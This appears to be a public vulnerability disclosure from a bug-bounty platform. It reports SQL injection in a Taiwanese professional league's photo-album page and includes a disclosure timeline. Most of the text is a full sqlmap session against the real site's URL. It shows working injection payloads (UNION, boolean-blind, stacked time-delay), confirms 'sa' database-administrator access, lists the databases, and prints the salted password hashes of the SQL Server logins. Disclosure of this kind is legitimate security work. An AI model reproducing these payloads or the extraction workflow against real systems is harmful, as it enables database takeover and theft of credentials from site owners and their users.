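2015-03-04: Details reported to the vendor; awaiting vendor handling
2015-03-08: Vendor confirmed; details disclosed to the vendor only
2015-03-18: Details disclosed to core white hats and experts in related fields
2015-03-28: Details disclosed to regular white hats
2015-04-07: Details disclosed to intern white hats
2015-04-18: Details disclosed to the public
SQL Injection in a Taiwanese Professional League Website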
[root@Hacker~]# Sqlmap sqlmap.py -u "http://www.cpbl.com.tw/photo/list.aspx?album_id=100" --dbs --passwords --current-user --current-db

    sqlmap/1.0-dev - automatic SQL injection and database takeover tool
    http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal l

[*] starting at 21:15:20

[21:15:21] [INFO] resuming back-end DBMS 'microsoft sql server'
[21:15:21] [INFO] testing connection to the target URL
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: album_id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: album_id=100' AND 6903=6903 AND 'gOCi'='gOCi

    Type: UNION query
    Title: Generic UNION query (NULL) - 1 column
    Payload: album_id=-6039' UNION ALL SELECT CHAR(113)+CHAR(101)+CHAR(115)+CHAR(101)+CHAR(113)+CHAR(119)+CHAR(79)+CHAR(113)+CHAR(87)+CHAR(67)+CHAR(112)+CHAR(107)+CHAR(105)+CHAR(112)+CHA

    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries
    Payload: album_id=100'; WAITFOR DELAY '0:0:5'--

    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind
    Payload: album_id=100' WAITFOR DELAY '0:0:5'--
---
[21:15:21] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2008
web application technology: ASP.NET, Microsoft IIS 7.5, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2008
[21:15:21] [INFO] fetching current user
[21:15:21] [WARNING] reflective value(s) found and filtering out
current user: 'sa'
[21:15:21] [INFO] fetching current database
current database: 'cpbl2014'
[21:15:21] [INFO] fetching database users password hashes
[21:15:21] [INFO] the SQL query used returns 3 entries
[21:15:21] [INFO] retrieved: "##MS_PolicyEventProcessingLogin##","0x0100b9b11...
[21:15:22] [INFO] retrieved: "##MS_PolicyTsqlExecutionLogin##","0x0100c488f8b...
[21:15:22] [INFO] retrieved: "sa","0x01000a7d31ddbdcfe5f3382f611c3dbf94ff5d7c...
do you want to store hashes to a temporary file for eventual further processing with other tools [y/N] n
do you want to perform a dictionary-based attack against retrieved password hashes? [Y/n/q] n
database management system users password hashes:
[*] ##MS_PolicyEventProcessingLogin## [1]:
    password hash: 0x0100b9b112931c8584c890956313a22483a6f619d67257fb4d54
        header: 0x0100
        salt: b9b11293
        mixedcase: 1c8584c890956313a22483a6f619d67257fb4d54
[*] ##MS_PolicyTsqlExecutionLogin## [1]:
    password hash: 0x0100c488f8b3da96c6c7d5044e1e5e614525278424c50ebdaa16
        header: 0x0100
        salt: c488f8b3
        mixedcase: da96c6c7d5044e1e5e614525278424c50ebdaa16
[*] sa [1]:
    password hash: 0x01000a7d31ddbdcfe5f3382f611c3dbf94ff5d7ca81e6eef7efa
        header: 0x0100
        salt: 0a7d31dd
        mixedcase: bdcfe5f3382f611c3dbf94ff5d7ca81e6eef7efa

[21:15:34] [INFO] fetching database names
[21:15:34] [INFO] the SQL query used returns 6 entries
[21:15:34] [INFO] resumed: "cpbl2014"
[21:15:34] [INFO] resumed: "event_db"
[21:15:34] [INFO] resumed: "master"
[21:15:34] [INFO] resumed: "model"
[21:15:34] [INFO] resumed: "msdb"
[21:15:34] [INFO] resumed: "tempdb"
available databases [6]:
[*] cpbl2014
[*] event_db
[*] master
[*] model
[*] msdb
[*] tempdb

[21:15:34] [WARNING] cannot properly display Unicode characters inside Windows OS command prompt (http://bugs.python.org/issue1602). All unhandled occurances will result in replacement w
[21:15:34] [INFO] fetched data logged to text files under 'C:\Users\ADMINI~1\Desktop\???~1\???~1\SQLMAP~1.4\Bin\output\www.cpbl.com.tw'
Severity: High
Vulnerability Rank: 20
Confirmed at: 2015-03-08 04:12
current user: 'sa'
current user is DBA: True
Thank you for the report.
None at this time